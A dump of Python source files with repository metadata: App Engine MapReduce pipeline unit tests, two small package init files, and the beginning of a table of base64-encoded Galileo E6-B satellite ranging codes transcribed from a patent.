4659ef8ad5a56ccb89b28121d451b5638378d319
| 12,439
|
py
|
Python
|
python/test/mapreduce/mapper_pipeline_test.py
|
rolepoint/appengine-mapreduce
|
8710047353b8cb37938ec170c3019dfb099e5697
|
[
"Apache-2.0"
] | null | null | null |
python/test/mapreduce/mapper_pipeline_test.py
|
rolepoint/appengine-mapreduce
|
8710047353b8cb37938ec170c3019dfb099e5697
|
[
"Apache-2.0"
] | 1
|
2015-01-30T02:50:09.000Z
|
2015-01-30T02:52:00.000Z
|
python/test/mapreduce/mapper_pipeline_test.py
|
rolepoint/appengine-mapreduce
|
8710047353b8cb37938ec170c3019dfb099e5697
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2011 Google Inc. All Rights Reserved.
# pylint: disable=g-bad-name
import datetime
import unittest
from mapreduce.lib import pipeline
from google.appengine.api import files
from google.appengine.ext import db
from mapreduce import context
from mapreduce import errors
from mapreduce import input_readers
from mapreduce import mapper_pipeline
from mapreduce import model
from mapreduce import output_writers
from mapreduce import test_support
from testlib import testutil
class TestEntity(db.Model):
"""Test entity class."""
data = db.StringProperty()
dt = db.DateTimeProperty(default=datetime.datetime(2000, 1, 1))
class TestOutputEntity(db.Model):
"""TestOutput entity class."""
data = db.StringProperty()
class RetryCount(db.Model):
"""Use to keep track of slice/shard retries."""
retries = db.IntegerProperty()
def test_fail_map(_):
"""Always fail job immediately."""
raise errors.FailJobError()
def test_slice_retry_map(entity):
"""Raise exception for 11 times when data is 100."""
if entity.data == "100":
retry_count = RetryCount.get_by_key_name(entity.data)
if not retry_count:
retry_count = RetryCount(key_name=entity.data, retries=0)
if retry_count.retries < 11:
retry_count.retries += 1
retry_count.put()
raise Exception()
TestOutputEntity(key_name=entity.data, data=entity.data).put()
def test_shard_retry_map(entity):
"""Raise exception 12 times when data is 100."""
if entity.data == "100":
retry_count = RetryCount.get_by_key_name(entity.data)
if not retry_count:
retry_count = RetryCount(key_name=entity.data, retries=0)
if retry_count.retries < 12:
retry_count.retries += 1
retry_count.put()
raise Exception()
TestOutputEntity(key_name=entity.data, data=entity.data).put()
def test_shard_retry_too_many_map(entity):
"""Raise shard retry exception 45 times when data is 100."""
if entity.data == "100":
retry_count = RetryCount.get_by_key_name(entity.data)
if not retry_count:
retry_count = RetryCount(key_name=entity.data, retries=0)
if retry_count.retries < 45:
retry_count.retries += 1
retry_count.put()
raise Exception()
TestOutputEntity(key_name=entity.data, data=entity.data).put()
def test_map(entity):
"""Test map handler."""
yield (entity.data, "")
def test_empty_handler(entity):
"""Test handler that does nothing."""
pass
class CleanupPipelineTest(testutil.HandlerTestBase):
"""Tests for the CleanupPipeline class."""
def setUp(self):
testutil.HandlerTestBase.setUp(self)
pipeline.Pipeline._send_mail = self._send_mail
self.emails = []
def _send_mail(self, sender, subject, body, html=None):
"""Callback function for sending mail."""
self.emails.append((sender, subject, body, html))
def testCleanup_Flat(self):
"""Tests cleaning up a flat list of files."""
# Prepare test data
entity_count = 200
for i in range(entity_count):
TestEntity(data=str(i)).put()
TestEntity(data=str(i)).put()
# Run map
p = mapper_pipeline.MapperPipeline(
"test",
handler_spec=__name__ + ".test_map",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
output_writer_spec=
output_writers.__name__ + ".KeyValueBlobstoreOutputWriter",
params={
"input_reader": {
"entity_kind": __name__ + ".TestEntity",
},
},
)
p.start()
test_support.execute_until_empty(self.taskqueue)
finished_map = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
# Can open files
file_list = finished_map.outputs.default.value
self.assertTrue(len(file_list) > 0)
for name in file_list:
files.open(name, "r").read(0)
# Cleanup
cleanup = mapper_pipeline._CleanupPipeline(file_list)
cleanup.start()
test_support.execute_until_empty(self.taskqueue)
# Cannot open files
for name in file_list:
self.assertRaises(files.Error, files.open, name, "r")
def testCleanup_ListOfLists(self):
"""Tests cleaning up a list of file lists."""
# Prepare test data
entity_count = 200
for i in range(entity_count):
TestEntity(data=str(i)).put()
TestEntity(data=str(i)).put()
# Run map
p = mapper_pipeline.MapperPipeline(
"test",
handler_spec=__name__ + ".test_map",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
output_writer_spec=
output_writers.__name__ + ".KeyValueBlobstoreOutputWriter",
params={
"input_reader": {
"entity_kind": __name__ + ".TestEntity",
},
},
)
p.start()
test_support.execute_until_empty(self.taskqueue)
finished_map = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
# Can open files
file_list = finished_map.outputs.default.value
self.assertTrue(len(file_list) > 0)
for name in file_list:
files.open(name, "r").read(0)
grouped_list = [file_list]
# Cleanup
cleanup = mapper_pipeline._CleanupPipeline(grouped_list)
cleanup.start()
test_support.execute_until_empty(self.taskqueue)
# Cannot open files
for name in file_list:
self.assertRaises(files.Error, files.open, name, "r")
class MapperPipelineTest(testutil.HandlerTestBase):
"""Tests for MapperPipeline."""
def setUp(self):
testutil.HandlerTestBase.setUp(self)
pipeline.Pipeline._send_mail = self._send_mail
self.emails = []
def _send_mail(self, sender, subject, body, html=None):
"""Callback function for sending mail."""
self.emails.append((sender, subject, body, html))
def testEmptyMapper(self):
"""Test empty mapper over empty dataset."""
p = mapper_pipeline.MapperPipeline(
"empty_map",
handler_spec=__name__ + ".test_empty_handler",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
params={
"input_reader": {
"entity_kind": __name__ + ".TestEntity",
# Test datetime can be json serialized.
"filters": [("dt", "=", datetime.datetime(2000, 1, 1))],
},
},
)
p.start()
test_support.execute_until_empty(self.taskqueue)
self.assertEquals(1, len(self.emails))
self.assertTrue(self.emails[0][1].startswith(
"Pipeline successful:"))
p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
# Verify outputs.
# Counter output
counters = p.outputs.counters.value
self.assertTrue(counters)
self.assertTrue(context.COUNTER_MAPPER_WALLTIME_MS in counters)
# Default output.
self.assertEqual([], p.outputs.default.value)
# Job id output.
self.assertTrue(p.outputs.job_id.filled)
state = model.MapreduceState.get_by_job_id(p.outputs.job_id.value)
self.assertEqual(model.MapreduceState.RESULT_SUCCESS, state.result_status)
# Result status output.
self.assertEqual(model.MapreduceState.RESULT_SUCCESS,
p.outputs.result_status.value)
def testFailedMap(self):
for i in range(1):
TestEntity(data=str(i)).put()
pipeline.pipeline._DEFAULT_MAX_ATTEMPTS = 1
p = mapper_pipeline.MapperPipeline(
"test",
handler_spec=__name__ + ".test_fail_map",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
params={
"input_reader": {
"entity_kind": __name__ + "." + TestEntity.__name__,
},
},
shards=5)
p.start()
test_support.execute_until_empty(self.taskqueue)
p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
self.assertTrue(p.was_aborted)
self.assertTrue(p.outputs.job_id.filled)
state = model.MapreduceState.get_by_job_id(p.outputs.job_id.value)
self.assertEqual(model.MapreduceState.RESULT_FAILED, state.result_status)
self.assertFalse(p.outputs.result_status.filled)
self.assertFalse(p.outputs.default.filled)
self.assertEquals(1, len(self.emails))
self.assertTrue(self.emails[0][1].startswith(
"Pipeline aborted:"))
def testProcessEntities(self):
"""Test empty mapper over non-empty dataset."""
for _ in range(100):
TestEntity().put()
p = mapper_pipeline.MapperPipeline(
"empty_map",
handler_spec=__name__ + ".test_empty_handler",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
params={
"input_reader": {
"entity_kind": __name__ + ".TestEntity",
},
},
)
p.start()
test_support.execute_until_empty(self.taskqueue)
self.assertEquals(1, len(self.emails))
self.assertTrue(self.emails[0][1].startswith(
"Pipeline successful:"))
p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
self.assertTrue(p.outputs.job_id.filled)
counters = p.outputs.counters.value
self.assertTrue(counters)
self.assertTrue(context.COUNTER_MAPPER_WALLTIME_MS in counters)
self.assertEquals(100, counters[context.COUNTER_MAPPER_CALLS])
self.assertEqual(model.MapreduceState.RESULT_SUCCESS,
p.outputs.result_status.value)
self.assertEqual([], p.outputs.default.value)
def testSliceRetry(self):
entity_count = 200
db.delete(TestOutputEntity.all())
db.delete(RetryCount.all())
for i in range(entity_count):
TestEntity(data=str(i)).put()
p = mapper_pipeline.MapperPipeline(
"test",
handler_spec=__name__ + ".test_slice_retry_map",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
params={
"input_reader": {
"entity_kind": __name__ + "." + TestEntity.__name__,
},
},
shards=5)
p.start()
test_support.execute_until_empty(self.taskqueue)
self.assertEquals(1, len(self.emails))
self.assertTrue(self.emails[0][1].startswith(
"Pipeline successful:"))
p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
outputs = []
for output in TestOutputEntity.all():
outputs.append(int(output.data))
outputs.sort()
expected_outputs = [i for i in range(entity_count)]
expected_outputs.sort()
self.assertEquals(expected_outputs, outputs)
def testShardRetry(self):
entity_count = 200
db.delete(TestOutputEntity.all())
db.delete(RetryCount.all())
for i in range(entity_count):
TestEntity(data=str(i)).put()
p = mapper_pipeline.MapperPipeline(
"test",
handler_spec=__name__ + ".test_shard_retry_map",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
params={
"input_reader": {
"entity_kind": __name__ + "." + TestEntity.__name__,
},
},
shards=5)
p.start()
test_support.execute_until_empty(self.taskqueue)
self.assertEquals(1, len(self.emails))
self.assertTrue(self.emails[0][1].startswith(
"Pipeline successful:"))
p = mapper_pipeline.MapperPipeline.from_id(p.pipeline_id)
outputs = []
for output in TestOutputEntity.all():
outputs.append(int(output.data))
outputs.sort()
expected_outputs = [i for i in range(entity_count)]
expected_outputs.sort()
self.assertEquals(expected_outputs, outputs)
def testShardRetryTooMany(self):
entity_count = 200
db.delete(TestOutputEntity.all())
db.delete(RetryCount.all())
for i in range(entity_count):
TestEntity(data=str(i)).put()
p = mapper_pipeline.MapperPipeline(
"test",
handler_spec=__name__ + ".test_shard_retry_too_many_map",
input_reader_spec=input_readers.__name__ + ".DatastoreInputReader",
params={
"input_reader": {
"entity_kind": __name__ + "." + TestEntity.__name__,
},
},
shards=5)
p.max_attempts = 1
p.start()
test_support.execute_until_empty(self.taskqueue)
state = model.MapreduceState.all().get()
self.assertEqual(model.MapreduceState.RESULT_FAILED, state.result_status)
self.assertEquals(1, len(self.emails))
self.assertTrue(self.emails[0][1].startswith(
"Pipeline aborted:"))
if __name__ == "__main__":
unittest.main()
| 30.191748
| 78
| 0.669829
| 1,469
| 12,439
| 5.396869
| 0.138189
| 0.031786
| 0.052977
| 0.047553
| 0.799823
| 0.755424
| 0.743567
| 0.741297
| 0.741297
| 0.734738
| 0
| 0.010436
| 0.214246
| 12,439
| 411
| 79
| 30.265207
| 0.800696
| 0.076855
| 0
| 0.723549
| 0
| 0
| 0.069338
| 0.026364
| 0
| 0
| 0
| 0
| 0.122867
| 1
| 0.061433
| false
| 0.003413
| 0.044369
| 0
| 0.136519
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
469dca0b079020ec732b7d643edce4955e33299f
| 106
|
py
|
Python
|
cased/plugins/__init__.py
|
cased/cased-python
|
e3c529e3fe816331277812bf4e3db537eb5a54fc
|
[
"MIT"
] | null | null | null |
cased/plugins/__init__.py
|
cased/cased-python
|
e3c529e3fe816331277812bf4e3db537eb5a54fc
|
[
"MIT"
] | null | null | null |
cased/plugins/__init__.py
|
cased/cased-python
|
e3c529e3fe816331277812bf4e3db537eb5a54fc
|
[
"MIT"
] | null | null | null |
from cased.plugins.casedplugin import DataPlugin
from cased.plugins.casedplugin import CasedDefaultPlugin
| 35.333333
| 56
| 0.886792
| 12
| 106
| 7.833333
| 0.583333
| 0.191489
| 0.340426
| 0.574468
| 0.702128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 106
| 2
| 57
| 53
| 0.959184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
46a22e4eb342d4b6aa4a45089fe8603feb3934f5
| 81
|
py
|
Python
|
n_in_a_row/game_state/__init__.py
|
olokshyn/n_in_a_row
|
d47c16b58c755d640ced4e74854fa37653304e5d
|
[
"MIT"
] | null | null | null |
n_in_a_row/game_state/__init__.py
|
olokshyn/n_in_a_row
|
d47c16b58c755d640ced4e74854fa37653304e5d
|
[
"MIT"
] | null | null | null |
n_in_a_row/game_state/__init__.py
|
olokshyn/n_in_a_row
|
d47c16b58c755d640ced4e74854fa37653304e5d
|
[
"MIT"
] | null | null | null |
from .game_state import GameState
from .game_tree_builder import GameTreeBuilder
| 27
| 46
| 0.876543
| 11
| 81
| 6.181818
| 0.727273
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 47
| 40.5
| 0.931507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d3bf2c2f3f27590dfcb369b48d62ab8029da71a0
| 43,433
|
py
|
Python
|
gnsstools/galileo/e6b_strings.py
|
GNSSX/GNSS-DSP-tools
|
a06f83b2f25e3ffebc7502f363028ddfb1d5c8f7
|
[
"MIT"
] | 2
|
2020-02-28T18:13:51.000Z
|
2020-07-04T20:19:39.000Z
|
gnsstools/galileo/e6b_strings.py
|
GNSSNWO/GNSS-DSP-tools
|
a06f83b2f25e3ffebc7502f363028ddfb1d5c8f7
|
[
"MIT"
] | null | null | null |
gnsstools/galileo/e6b_strings.py
|
GNSSNWO/GNSS-DSP-tools
|
a06f83b2f25e3ffebc7502f363028ddfb1d5c8f7
|
[
"MIT"
] | null | null | null |
# Code strings the E6-B code
# OCR from European patent EP1825626B1.pdf (may have a few errors)
# The codes for the following PRNs have been compared with recorded signals and should be error-free:
# 1 2 3 4 5 7 8 9 11 12 13 14 15 18 19 21 24 25 26 27 30 31 33 36
e6b_strings = {
1: "5mSKpe/wkHoXA3f7IM7e4ejSU9rCSWgxAQM2tEQna6qxflmVSLGnnGc3n5jfDLga6NkU7klHCTrcuU/0s5Fu5WKkyv1KWgSXIWBuVf/+smyUnXyLCretL33bv4ipsJFRDSCaqj9sg+z7jeIbd+eTqedZ5zp+1jMDlf2TgOjobwpRHg/sjgtlAZg/p8aT////cZ7+QknvKVtXjlFIF9nobrwQkXs7dla+9smquCALIN7lS/2xhyijOTRQ8gsIp6yEqflFOY4TQ0vTB2CH8yyhZa+5T+qWhpJOgxukvXas9i17IWusU/cfrxoTWAvfu1bdVVhVqeJUH/3tKt+mEl1z8RYAanFVlgAdFTiw2RyNRF0DQrkQIZ6mS3enokXk5wrVR1kMPVnfMs+KzsttLxer2n+J2wnJai6BFZmjkZHO6PjUKgvCpdANjXwxjomWRwKA9VHSXfrxU3ZvbSNyNrI/vh50SEypSFhIzVwZZnBeoDoCIOhLGvyfCPi9wRDZWXlzwPNH9SWVke7vAMOZ2abvFAt1lGXgf0h6zpuM406yGaxjwBEnUgyOLS+nCQrHVJdrja5cUfGAAe0JVRjcZZtXRrOQImATpt7xxU30vh5gy6r9ENFj6Te8dTGEeRlmuTCZD53wqY0vkGAjOFjNaZYTCIh2JysjxvwnKIvn0ljOPoOg8tXDqbz8DnyfAqoKl6/DGihunPhb5Yhf+iLlGCfvsQZkUrJzNcAfyuZFtWgZudfHAUtLjAUOZHsbIVpF+Lk5YkQz8DGchA3qJl2GMaHummZDnamVY9sWjpwVdOJzD2qvcJqhRbdduIWxT7eOOKBZSKvGIGx5PDPOkYm/8ZM4wA",
2: "oqsdtXbyBh1pk6w4Mv8EHDiORCQKpuq2GrtFDZYe1sgIjAUxPooxsyLMdXw4n/iwM3kr/ayl09SSYyFJfdu9fED4M6qH7A0nsR4hXkkVKMCRmy4NMQbbujhO8isRM1OMeMdsSrrIST4Yow6ELNAFAe6ac3+K1+fXjvIuqCbolzvRmUWlowpBASldTZAQz7Iy4hh6mKuYdt4cmzOyOoMoAo6REaOtYS11g7DmpQKqOq1+kGgAE6PC6DxHXGhzB7m0txtmjueyVzdW8aufx99NuwV3yH/qcDGho7VdBUcxwf14SSltA/Zr7NBNwlyZv+vYEGIpcMFgJINWoVoYw/aQfjnEvoLqyK04dNPsZ+d/uvarJd4/52S9IrPsJMlE5LwGBnU2nedkKXLcoZpof2aAz1mO7xspunpMFdQ6b+M6qGe5KfFY583swI4RtuNSUq0Uit59qu2LF2SP8emAlOVguJt19yCEvNpLk9I3VV8/oiciU39Keuqb7CKNe6ndcYmxFlw12bz3eR5II/2BoFEx2d3w9pZFjJP/JV3tqyxLVbZPX/YhuKR3PBqVwLR9hOL0EKedj5Wcdq6iR4RqFmaEVlO6R8/udixoRu37XfrhRPoxUB/BjYy3cWC4s/pVAMMNX7HIsLj1BgGC8ni9dI47ZNjaf6haSOAXnKOiRBsiBfvF4zW8SdCx/mCy1/lEhMKSF4CzG5lodH7k0Z8a69MU+AGPR2Sbjv5tj3IwToEPoiMBtiBnQgJlHXOjw6+EzCWfJqt3X0b9lH6lgYsFUiRmepTCnQvkTpJQU8sKNfxnCh/r856wDX1krSOvA2kV2zb6tlStnV85s/l/FtsLlSJxgA",
3: "18UMqrF0cac1xR1HWWRL5KeI/qjs1fF+ALNz29JJF0gdp0GCCATqXLNmiFrf/JiO4hoIde56NpgXJrcQbuPH5MFDWJDkFaL3RmdjPh3H0ln/LDodQI/sTReSMm52kSU/bcPnubQ+tUauKOYVKYT/Z35FhbFje4o4xwQhOAUIiPiOoEeel0gz6l2htEU1DUMi22JfVn9tzD8aj0CWvlMzvwucf1VFxddDCpk1ogAf0XQqo05XL4hokqwGG0odMGuRko8qjBWeI30jpL+dCPZ4D5k2+mpjaEUAzcUe1q0rI1dMRZuDugUEzrIZgPMk+Ro3pI6EAhVcuXeY8mGNwpL/q9nbgABQDDDUuF9NYkm0Az0JjAgxblcLEOXJOd4Iwd3pGLdJMyteaqSIpa+Tf2CUFOiFx3qVPYypP9OCyoR1L1S9J3n0YPDt7kjJmuqDeHfvAa+paH8zQhj47bI+uj/ArIz4u1eUVi5tWwo1bNtrz8DKwqzObO6vECypgLI6NvicNUcNC7Qci+sr4ObNDJaJ3y0ZB6/mibScGdRTmqGkhBK28VIng5Yp0ql2JJ/wVyYZQMbohxnuhnLop3LnzRDfZpselmqNk8Sz6bnU0BSLtT8nIgjxkrNwsXKR0zVz2Lp2mEspgDQ5KN5PetXjNfvM/bvTHI6fpjAVMn0FF+ovFh71oIvMCFa21b0hD6PfrpGO3XxORElW//JFWkw8ceq3FaEvud8UXH+09GoXyHd5fuFYc3pzD4k3vG34MlgVRk7tT0it5xjAHMe/5ZedcdH8h5lFJPicp4l4i6BX+dSZ7cfh3Gv/QZIPwbXD3iY9V2izEje751BhflgCCUU33I5iwA",
4: "qmlpc8Ol6Bgwn3MmTZ7iGfxpaS8Qb3/LitzD/OmBbGkcB7mWwOXe32NQG2Om+eXyGfz4rLgR6YA0a6QyzMbioPqVueMO0DRorH0cClkDU1lmbxoEx2c/f7fFV29rLGVIl59IB1TUx8MaSk4SVRTb+2G9GZgwhVqSi6WFMSV+AfXWnSIixWwEcsM1TeoZ1WPv+eJRUCVvLX52oPcZtjrWkXuhPGnUmyKP3n1BgbhDriP02HQNlC8nu3AxmdcKDrXTwN8E8Lq6muIUCMYHA0X6gqaXkruI8RlMbCBQCKcpPAdxabu1goHPV98YRsl2r75bqvvwXElIrsR0zoWw3aRQRB2sHneLxj0bddhnUy+jU0zuwLeW6tp2uO/MH7tw9JAghufHkm/xntt1+phIUlBo1ZHR8Og5lbwQwKJd2OIiRatyVY0n9iDnheUTIGLzr2Quucg5RHFMv1qY6hhAJQA4D6puqngj4Arda3Dd0ch55IbGw5/Npd1zR5iqcKvAeteGfwPsPB1HgifcyRcBrqflCQhasxmFh5DWkqybGoVTfnoW1GgtaeDvX65js0LYbGthDbQQIv5GqAE6dWoxMcBzGiE8O7B5gavVPCIQPFCUY2zWMLquyUAOV03+1F+sXhr4MgbmLRSGqArc6sionTuPm8jIjtXx7EoxyxZIdRCgVMrKdyXj/8SvTGWn3b5NCGH0WT+EzjbFJ1xUO1c7OtwWWSV95TOW9mfoo/Q3XaSrI+tiJUZUfB5R60NtsnvD8yGxXDc94nVfP4YKiizmLJDnKHF+Xo3wmuxn/aws2E/4zpGAtNop0y9S/4SfZLxlJ47q0lu1TxszonNe6axXZvLjAA",
5: "qkiwzHJve4W5rOTUI5ZKHlSNbLePiG3pQeSTYOU+qnrTA7z03fPo5kDbczcnCCrtEIw8SXZEgA4UrnjfldMhTZSL7cs9Uv6qaP758KmGYrOQyg6Y5mPr+LdFmoUm4G9jljCzeQtRlfkzD/oLypwUEgE2zxFWCVa1mKOmVqBF4lS/q09MmQf4LB0r3/NZWJgNSc0+nR3hzYbXKjU4U3HNpsO99CJWsT7my5WfHLv+bKdJODUSMUEIlQm52HQb5pL9aYDB9y8yjGcPqRiCrzadjXX2QKSusgkjc43g3i/4wpylBVdcWbd50y95DXr421xeE4EOsxaETRz60pegQdO5vlJINhgOUDmu55REyh7TUq1N1h9xAa4tVWzsqn598fe/Loi65X9gkGwnwSrwN4DkLB8PSiIimIMTMmiYco5c6OCSZzY1dfmy6pdklec5UsBeaflVxfZpN6S+FX1bpj9SmiiEb8JdgAyIWPi+SYhoH9tilNrXblAcQNikm4Fq6JkNTu4qAp3JuhcX63wBPtjW9X3tpHhJYPxQW5Gh/nIPEbldv3kA/fGC0EabZ2ThWdzBcDzUzpqionNNB+hrN2otQVwrEfy/+wwknasLSNJ2hdPMIHTg93rQggba1r5hJ6Rflw68H+1cp3IyPA1wNp5TkGUYj+37LploQlw9XzhWU4DZWAdbfqtvzHRkvEp3zCPrB+gSSKXtaK+ADFoZB024sK1kA7iHXNnJ6VygnbMD2oeatGi8IT8kjcJ/r5LjL2sH42b0OobvMPjzywnPlAaeaFRshgCWT8Dff0E9Lf61zqwSwXbkkCOtdCCYOM8Jkt0NJnn3/tO8I2cHoTQldqclgA",
6: "xSmgtCA2FP0dhFHRDcOa2uYXuwOpGL2J+4HUAoETcktMfoSrsZd+NfYyvD/zMWoNbPRl3NOQYvo/7efwzNB2TxseLydEUoLOxmCPFqD4/5lDGcnIkwH/aFKUlxOConNgYmSewoB5G3ckw10UqUAKQ3uVFhh1FDyGtR1ODDGbgi6NkcCb2WWqf4PAZXp95eNGonZC19Y4oAzg8Ld7uE1FxoEhykt/kweyZ4UawGrJ9NTK1U/opigKDCUpqyd6mBQzWX9mjESWGoE9YlXiuimusFG/lDLE51Jy98NqIEvSC+xREaKI6FWdaPMkKQD8In2Du9IBOW43EPsqPLPuxKeBCgdKkgkIoTdXezWZwrc3sj2X2AFfH/5jlsI2DUYGd2cFPHpxvMWCZMP9VL7XtXc/1yeu6ioZ+GQoTx4CVKg34RwbH70sp0fE38LmDdda8ESpcUVMEidZU3De7EofTaOd9KnWQWw+TMizNPROw/WuIwY7tQAlpaWzwSUql551TED9Lkprd5x7DVzywKN6VpoSbghczAB9arkdjto93tsep9S1t9v9p484VS5mO0nUFnsPapIgPtY8t61RFHPx9ul2A0xPMa88B+co5bmR+j9PrTeaZ57u4qc69yNiPSKs+OBydYnjbezY+P/tegSLkR+vYW5It/oYKfu/Z3ho2QHA2otdFDOzp/nMy0UIEsBNKAyMKhMRO2FJ9UkFY2zdGRRU+wVhPYvIo2U24zfogH4Lqy7btk35hkd8tPk8keu5wthbCuwiRXywf8HbmNUrtz6Jb/WbHVuhWspcuWluNBCmum4uHZSw3MAdh290Qup23K2fsmLvEVPN0rAV9Hg5FsVVwA",
7: "8EQSl2WAo9UQa6NYV1xVSacFTg37EUve0J7S+GZYAd6PfXThdNg5MYeFDtJp4QVckGDDRB37kco8rYSlwR/tEmcUyMubuTTQPySgNQ0yh6ZNGG+lyUVjTHHw16T/UCS73S156Ot13n8xmFWF0Fbu8eup5MEAQ1d2p9NGXG2uIbHYmg/fAmSlq5+cekQY9rWjF+2CjmPWqlZsURlCID5i66TfvLgY7WIs8DMC4bOoXAsPBfHLePmpDHfvhWW/cD3PXUXI2VZ2X5lMj7MkPOCJ5o5wXzEL+em4GwROMHxyM8wdTjI39q9bGmmavBH8TB23qZi5yxlFT1q57X0//l7lWmGErPodOkgbt0qy5w4ogJ+S+hXLmeoKx8u6E4W72j2FblwsOqN57AiOrUhteC/SjFQz7BHwHMmWovFb87WzZ1KhiPrze/3BcKVEEdXQs21SBk2I/0x5wfDiglzWvZxoEcCxNvnvpydZHpjn1nOtK4G49wMyNWifnreKTahdPCa1Lws9gicEihkbPCgFMRBytVbouMPdlh5yz7YjXcasotFkQawhUcN9mqsbE7225Oguj91H/ZnoughRMcTMXYAca5BggDJvZaXF/ND8IoYq9qrLeRUq7s4N3z1DLg0AJTkBTKjHx4L15AKxLDT0QOx0OfjOFoL6bCtInA+4ZQ5/sgr1k0FlUinEUKopsksnn5uLOLYvz8Fm4AEl1q7lPDzfTOQSBtgp4Auu+nm421HOzk4stmoeMKHDmiw5WYuGdak1u6pOkp3yfKo9QQuum3TawUNbPobJwn/VESqbnZ5/emWxTwiWLzQBPeyQakh/wjPbi9JN6GFqjqrqb0vRiq+zwA",
8: "53uMoIGwQjTMLhSOzdw4kS3l0iOZU1EsIlPTYk1SvlfdPzgT/M25ToPgdMxgI5k3BNhipCOPN3xe6I32D0HZ85UvyFz+3FAKdbcRboXDDZeLU5b/Caki+fBl7QULp+o/r1lZDqFnoQJwWVwI9fYNNPIy2q7/Lk2eC/UFaOYZopF1vuuXoXz6TXM6xwJp92IZ5IAWLudjBODQf88QM4KcE9KTImGavXMspJua3Zg3JeKxBMFdxJXgH5r3o5jbAEl6mr+OJpjUNgw3Nk11JAOwtiWve1mI17vBHtN7/vCH2b7XmVj7Jpm1OC0xiuiu25dHaqaeVvyuJnbw8xgvws2JWe6XKpnVS9MzbayQTIKOqMQhxlV7RQTWVc51QxEsQ1VMRytQJjtRnVn1UVdmz6SARE1sHcsVpoOG1NUYFUtjny1eAeCG7fGnOgAFrZGuYYt7Be0MN2D9/1Ilk/Fpzrz/oii7lgNQ479nIB+9IciiuCMo3ObHGRK/9WgJdzBwnFTycdMgGsVjRDNh1VoqPpiXJet8UQgjotT3L/7+yBwwAS/o7uR5zh9T4aEtFdK8Ua7CPVyG8K9ZGGaRAi+mdOW/QFqpan4AOYvfAuT55mhSxE5efVg6fURcvcVKZHDAg8RDQKZfb3QHpMe7eE600Jpo/UHidWgpSy0T3lwqt9THgR/P9nqXhCtxIZ2fOtmJno4zSWDbVllqQcNkX6uEL8HPQeiZfO8Sd9lhYgyKiD23YfGhJq3Kk6QXIwpBnADk979/sxda6x72FL3fEa00Y3FfOaYbGwAdW51NX9NW8ulOdp0NI9y0axfl3NCRr6LOLC6BlibwGhTPVHOhOJq4QPnuQA",
9: "uyX9mccxIJ52LUMowFPs29ABGCAf96iDb452Ue919SzY/UhmLVP4zdmqdwxM/Qsvv6B+Wa4boXdoQCaiTk2Wu6O4VuVhA3UqEcN9rLRCYhPV7kf8gsDecLxJc/oCTfUd9WdlnmlHz1HTnNIc97iRGRcmU1Q/5U8cVyMtOtyzR2kbQl1WaZb1+NsJwx4wmSOsPVQi03YPHyK573QDp/pvMKYRzuh7fEbcg5r+ML75J6xvQEeKtAhMOl4IZL/DYl60lLL+q9Cgg3ozlNydIdA1Ev+U4mBmVUDGrq4sU1KV/Uukrd+fNMHvxIB+ZdWZSYRo9Tn9DAAIr3e5JiRMOqtYV7nw4lEIVvw3EhC+DQVNlqh7V0gOxDvkrUIf4OAKAarQZCKZAxK4bcry4m8jJ80z3LBX/UzflPg7V4UQxNfVZgqGTGyxECt8zTyfQ/WGJEO5A0tY8do0d0k2nJfb5v7o7wCTKCVNXWb7n0VSI1Srx6QsIijuU8Qcc2jH+3mAANefDFk/HPHmOJ8fP5czVNzHTs3J1CmdLM0+rhMgr+W7gCdkGxMkXXFJtt0e6OELgotvLHksWXy88phbzWMEjvkBVKUJ01K5rSAlnsdVFXLKlmX3s6lvGa9Ja8zfQv62NA3OCiekzv1HVecXUdycXWyVQo6it4g+mTeFGWLjxtgXyqjsVm+T7fOYy8EXuTcqAbJRkiU1ao2nLNa1FdjbXew+rsc2VlARToL72EaG6xHaP16WcUcchEmIN15BBcN+AMuiIKOx4noEm5dT0GTiHnlRP4kvtWIKxI46AHD++JvpMzxS5sFR/DzjbCEVUAfRtnzbzLTmDP08LFmoEzC3IMPVgA",
